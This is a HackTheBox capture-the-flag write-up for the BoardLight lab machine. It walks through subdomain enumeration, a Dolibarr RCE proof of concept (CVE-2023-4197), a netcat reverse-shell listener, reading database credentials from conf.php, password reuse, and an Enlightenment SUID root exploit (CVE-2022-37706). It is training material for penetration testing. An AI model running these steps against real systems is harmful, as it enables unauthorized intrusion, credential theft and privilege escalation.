Hackthebox: BoardLight

Overview

BoardLight is an easy-difficulty HackTheBox machine that deals with subdomain enumeration to discover a hidden Dolibarr crm subdomain that is vulnerable to CVE-2023-4197, later exfiltrating some database credentials allow us to gain the user flag. For root, we’ll be abusing CVE-2022-37706 that is a Enlightenment windows manager local privilege escalation.

BoardLight-info-card

Reconnaissance

Nmap

PS C:\Users\0xkujen> nmap -A -Pn 10.129.17.205
Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-27 21:13 W. Central Africa Standard Time
NSOCK ERROR [0.3130s] ssl_init_helper(): OpenSSL legacy provider failed to load.

Nmap scan report for 10.129.17.205
Host is up (0.13s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 062d3b851059ff7366277f0eae03eaf4 (RSA)
|   256 5903dc52873a359934447433783135fb (ECDSA)
|_  256 ab1338e43ee024b46938a9638238ddf4 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.41 (Ubuntu)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.93%E=4%D=9/27%OT=22%CT=1%CU=38673%PV=Y%DS=2%DC=T%G=Y%TM=66F711F
OS:F%P=i686-pc-windows-windows)SEQ(SP=104%GCD=1%ISR=10C%TI=Z%CI=Z%II=I%TS=A
OS:)SEQ(CI=Z)SEQ(CI=Z%II=I)OPS(O1=M54EST11NW7%O2=M54EST11NW7%O3=M54ENNT11NW
OS:7%O4=M54EST11NW7%O5=M54EST11NW7%O6=M54EST11)WIN(W1=FE88%W2=FE88%W3=FE88%
OS:W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M54ENNSNW7%CC=Y%Q=)T1
OS:(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%
OS:S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(
OS:R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F
OS:=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G
OS:%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 111/tcp)
HOP RTT       ADDRESS
1   171.00 ms 10.10.16.1
2   171.00 ms 10.129.17.205

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 37.45 seconds

We can see that we have two open ports: 22 for ssh and 80 for http (which means we have a web application)
We can also see that we have a board.htb domain so we go ahead and add that to our /etc/hosts file.

Subdomain Enumeration

PS C:\Users\0xkujen\Tools\ffuf> .\ffuf.exe -w ..\SecLists\Discovery\DNS\bitquark-subdomains-top100000.txt -H "Host: FUZZ.board.htb" -u "http://10.129.17.205" -mc 200 -fs 15949

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://10.129.17.205
 :: Wordlist         : FUZZ: C:\Users\0xkujen\Tools\SecLists\Discovery\DNS\bitquark-subdomains-top100000.txt
 :: Header           : Host: FUZZ.board.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200
 :: Filter           : Response size: 15949
________________________________________________

crm                     [Status: 200, Size: 6360, Words: 397, Lines: 150, Duration: 1150ms]

We can see that we have a crm subdomain, let’s go ahead and add crm.board.htb to our /etc/hosts

Web Application - http://crm.board.htb

We are prompted with a Dolibarr login page:

Dolibarr login

Before trying anything, I searched for any exploits related to Dolibarr 17.0.0 version, and I successfully found CVE-2023-4197 which is an Improper Input Sanitization Vulnerability in Dolibarr’s crm.
I found this really helpful public POC for it which will grant me a shell on the user running the web app:

PS C:\Users\0xkujen> python3 .\poc.py http://crm.board.htb admin admin "ls"

===== Dolibarr ERP CRM (v18.0.1) Improper Input Sanitization Vulnerability (CVE-2023-4197) =====

[+] Attempting to authenticate...
[+] Authenticated successfully!
[+] Attempting to create a website...
[+] Created website name: "ef234d8b922543288599715f34155f52"!
[+] Attempting to create a web page...
[+] Created web page name: "4e2cc3180b8d4bcf966cd5a7ad9dd125"!
[+] Attempting to modify the web page...
[+] Web page modified successfully!
[+] Triggering RCE now via: http://crm.board.htb/public/website/index.php?website=ef234d8b922543288599715f34155f52&pageref=4e2cc3180b8d4bcf966cd5a7ad9dd125
[+] RCE successful! Output of command:

index.php
shell.sh
shell.sh.1
styles.css.php
styles.css.php
PS C:\Users\0xkujen> python3 .\poc.py http://crm.board.htb admin admin "bash shell.sh"

===== Dolibarr ERP CRM (v18.0.1) Improper Input Sanitization Vulnerability (CVE-2023-4197) =====

[+] Attempting to authenticate...
[+] Authenticated successfully!
[+] Attempting to create a website...
[+] Created website name: "a01508975cc4466c8a24f59e2994655d"!
[+] Attempting to create a web page...
[+] Created web page name: "148cfdbf321a4f4cbe398addae9c1aa0"!
[+] Attempting to modify the web page...
[+] Web page modified successfully!
[+] Triggering RCE now via: http://crm.board.htb/public/website/index.php?website=a01508975cc4466c8a24f59e2994655d&pageref=148cfdbf321a4f4cbe398addae9c1aa0

PS C:\Users\0xkujen> nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.x.x] from (UNKNOWN) [10.129.17.205] 59938
sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$

Now looking for some database files, we stumble upon a conf.php file:

www-data@boardlight:~/html$ find . -name *conf.* 2> /dev/null
find . -name *conf.* 2> /dev/null
./crm.board.htb/nightwatch.conf.js
./crm.board.htb/htdocs/includes/ace/src/snippets/apache_conf.js
./crm.board.htb/htdocs/includes/ace/src/mode-apache_conf.js
./crm.board.htb/htdocs/core/class/conf.class.php
./crm.board.htb/htdocs/install/fileconf.php
./crm.board.htb/htdocs/conf/conf.php.old
./crm.board.htb/htdocs/conf/conf.php.example
./crm.board.htb/htdocs/conf/conf.php
www-data@boardlight:~/html$ cat ./crm.board.htb/htdocs/conf/conf.php
cat ./crm.board.htb/htdocs/conf/conf.php
<?php
//
// File generated by Dolibarr installer 17.0.0 on May 13, 2024
//
// Take a look at conf.php.example file for an example of conf.php file
// and explanations for all possibles parameters.
//
$dolibarr_main_url_root='http://crm.board.htb';
$dolibarr_main_document_root='/var/www/html/crm.board.htb/htdocs';
$dolibarr_main_url_root_alt='/custom';
$dolibarr_main_document_root_alt='/var/www/html/crm.board.htb/htdocs/custom';
$dolibarr_main_data_root='/var/www/html/crm.board.htb/documents';
$dolibarr_main_db_host='localhost';
$dolibarr_main_db_port='3306';
$dolibarr_main_db_name='dolibarr';
$dolibarr_main_db_prefix='llx_';
$dolibarr_main_db_user='dolibarrowner';
$dolibarr_main_db_pass='serverfun2$2023!!';
$dolibarr_main_db_type='mysqli';
$dolibarr_main_db_character_set='utf8';
$dolibarr_main_db_collation='utf8_unicode_ci';
// Authentication settings
$dolibarr_main_authentication='dolibarr';

Looking also at our /home directory, we find a user larissa, we try the serverfun2$2023!! password on her and we get our user.txt flag:

larissa@boardlight:~$ id
uid=1000(larissa) gid=1000(larissa) groups=1000(larissa),4(adm)
larissa@boardlight:~$ cat user.txt
3ae390e6867d32******************
larissa@boardlight:~$

Privilege Escalation - CVE-2022-37706

Checking our SUID permissions on files, we find something interesting:

larissa@boardlight:~$ find / -perm -4000 2> /dev/null
/usr/lib/eject/dmcrypt-get-device
/usr/lib/xorg/Xorg.wrap
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_ckpasswd
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_backlight
/usr/lib/x86_64-linux-gnu/enlightenment/modules/cpufreq/linux-gnu-x86_64-0.23.1/freqset
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/sbin/pppd
/usr/bin/newgrp
/usr/bin/mount
/usr/bin/sudo
/usr/bin/su
/usr/bin/chfn
/usr/bin/umount
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/fusermount
/usr/bin/chsh
/usr/bin/vmware-user-suid-wrapper
larissa@boardlight:~$

We can see something intersting which is Enlightenment that is a windows manager for linux.
Looking for known exploits for it, I stumbled upon CVE-2022-37706 which is an exploit that allows local users to obtain root privileges by exploiting enlightenment_sys in Englightenment:

larissa@boardlight:/tmp$ ./exploit.sh
CVE-2022-37706
[*] Trying to find the vulnerable SUID file...
[*] This may take few seconds...
[+] Vulnerable SUID binary found!
[+] Trying to pop a root shell!
[+] Enjoy the root shell :)
mount: /dev/../tmp/: can't find in /etc/fstab.
# id
uid=0(root) gid=0(root) groups=0(root),4(adm),1000(larissa)
# cat /root/root.txt
b95c0c23a589d6******************
#

And we get our root flag. It was a fairly short writeup since it was a straight forward machine. See you in future writeups :)

With love, 0xkujen